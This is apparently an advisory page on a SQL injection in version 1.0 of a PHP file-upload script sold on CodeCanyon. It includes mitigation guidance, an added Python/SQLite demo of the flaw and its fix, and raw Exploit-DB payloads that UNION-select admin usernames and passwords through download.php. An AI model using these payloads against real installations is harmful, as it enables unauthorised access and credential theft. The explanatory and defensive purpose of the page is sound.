Vendor: MySQL File and Image Uploader and Sharing Blob File Server
By: Ihsan Sencan
CVSS: 7.5 (HIGH)
Vulnerability type: SQL Injection
CWE: 89
Product Name: MySQL File and Image Uploader and Sharing Blob File Server
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:nelliwinne:mysql_file_and_image_uploader_and_sharing_blob_file_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
Published: 2017

MySQL Blob Uploader – File Upload to Database PHP Script v1.0 – SQL Injection

MySQL Blob Uploader - File Upload to Database PHP Script v1.0 (sold on CodeCanyon as "MySQL File and Image Uploader and Sharing Blob File Server") builds the SQL query in download.php directly from the 'id' GET parameter, without parameter binding or sanitization. An unauthenticated attacker can close the quoted string literal, append a UNION SELECT that reads rows from any other table, and comment out the rest of the query. The published payloads below do exactly that to read the 'un' and 'pw' columns of the admin table for both t=files and t=images_title; note that the two payloads use different column counts (6 and 7), because a UNION must match the column count of the query it is spliced into. Depending on the privileges of the database account the script uses, the same injection point can also be used to modify or delete data. The original advisory states that other files in the script are affected in the same way, and no vendor patch is known.

Mitigation:

Input validation alone is not a sufficient defence against SQL injection. Queries that take user-supplied values must use prepared statements with bound parameters (PDO or mysqli in PHP) so that the value of 'id' is never concatenated into SQL text; numeric identifiers should additionally be cast to integers before use. Parameters that select a table or record type, such as 't', cannot be bound and must instead be checked against a fixed whitelist of allowed values. Because no vendor patch exists, these changes have to be applied by whoever deploys the script.
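The following is an added example written for this page; it is not code from the advisory or from the vendor's script. It reproduces the shape of the flaw described above in SQLite (a query assembled from the 'id' and 't' parameters), runs UNION payloads with the same structure as the published ones, shows why the 6-column payload cannot be reused against the 7-column query, and then applies the mitigation (bound parameter plus a whitelist for 't'). The table and column layouts for 'files', 'images_title' and 'admin' are constructed here to match the payloads' column counts and the admin(un, pw) columns they read; the real schema is not on the page. The payloads are adapted to SQLite: MySQL's versioned comment `/*!50000union*/` and the hex string `0x3c62723e` are replaced by a plain `UNION` and the literal `'<br>'`.

```python
"""Added example: simulate the download.php injection and its fix in SQLite.

Assumptions (not from the advisory): the schema below is constructed so that
'files' has 6 columns, 'images_title' has 7 and 'admin' has (id, un, pw),
mirroring the column counts and target columns of the published payloads.
"""
import sqlite3

# Constructed sample data; only the column counts and admin(un, pw) matter.
SCHEMA = """
CREATE TABLE files (id INTEGER PRIMARY KEY, name TEXT, mime TEXT, size INTEGER,
                    data BLOB, uploaded TEXT);
CREATE TABLE images_title (id INTEGER PRIMARY KEY, title TEXT, name TEXT,
                           mime TEXT, size INTEGER, data BLOB, uploaded TEXT);
CREATE TABLE admin (id INTEGER PRIMARY KEY, un TEXT, pw TEXT);
INSERT INTO files VALUES (1, 'report.pdf', 'application/pdf', 1234, X'00', '2017-02-07');
INSERT INTO images_title VALUES (1, 'Logo', 'logo.png', 'image/png', 99, X'00', '2017-02-07');
INSERT INTO admin VALUES (1, 'admin', 'hunter2');
"""

# Payloads adapted from the advisory (6 columns for t=files, 7 for t=images_title):
# close the literal, UNION in the admin row, comment out the trailing quote.
PAYLOAD_6 = "-9999' UNION SELECT 1, un || '<br>' || pw, 3, 4, 5, 6 FROM admin-- -"
PAYLOAD_7 = "-9999' UNION SELECT 1, un || '<br>' || pw, 3, 4, 5, 6, 7 FROM admin-- -"

# Whitelist for the 't' selector: a table name cannot be a bound parameter.
ALLOWED_TABLES = {"files": "files", "images_title": "images_title"}


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def download_vulnerable(conn, id_param, t_param):
    """Mirror of the flaw: both GET parameters are pasted into the SQL text."""
    sql = f"SELECT * FROM {t_param} WHERE id='{id_param}'"
    return conn.execute(sql).fetchall()


def download_fixed(conn, id_param, t_param):
    """Hardened: whitelist the table selector and bind the id as an integer."""
    table = ALLOWED_TABLES.get(t_param)
    if table is None:
        raise ValueError("unknown record type")
    try:
        record_id = int(id_param)
    except ValueError:
        raise ValueError("id must be an integer") from None
    return conn.execute(f"SELECT * FROM {table} WHERE id=?", (record_id,)).fetchall()


def union_needs_matching_columns(conn):
    """The 6-column payload fails against the 7-column images_title query,
    which is why the advisory publishes a separate 7-column payload for it."""
    try:
        download_vulnerable(conn, PAYLOAD_6, "images_title")
        return False
    except sqlite3.OperationalError:
        return True


def fixed_rejects(conn, id_param, t_param):
    """True if the hardened handler refuses the request instead of running it."""
    try:
        download_fixed(conn, id_param, t_param)
        return False
    except ValueError:
        return True


def run_demo():
    conn = connect()
    return {
        "leaked_files": download_vulnerable(conn, PAYLOAD_6, "files"),
        "leaked_images": download_vulnerable(conn, PAYLOAD_7, "images_title"),
        "mismatch_rejected": union_needs_matching_columns(conn),
        "fixed_blocks_payload": fixed_rejects(conn, PAYLOAD_6, "files"),
        "fixed_blocks_bad_table": fixed_rejects(conn, "1", "admin"),
        "fixed_legit": download_fixed(conn, "1", "files"),
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

The leaked rows carry the admin username and password in the second column (the one the advisory's payload fills with concat_ws), while the hardened handler rejects the payload before any SQL runs because it is not an integer, and rejects t=admin because it is not in the whitelist. Casting the id is a defence in depth on top of the bound parameter, not a replacement for it.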

Exploit-DB raw data:

# # # # # 
# Exploit Title: MySQL Blob Uploader - File Upload to Database PHP Script v1.0 - SQL Injection
# Google Dork: N/A
# Date: 07.02.2017
# Vendor Homepage: http://nelliwinne.net/
# Software Buy: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300
# Demo: http://demos.nelliwinne.net/MySqlFileUpload/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/download.php?id=[SQL]&t=files
# -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files
# http://localhost/[PATH]/download.php?id=[SQL]&t=images_title
# -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6,7+from+admin-- -&t=images_title
# Etc....Other files have vulnerabilities ...
# # # # #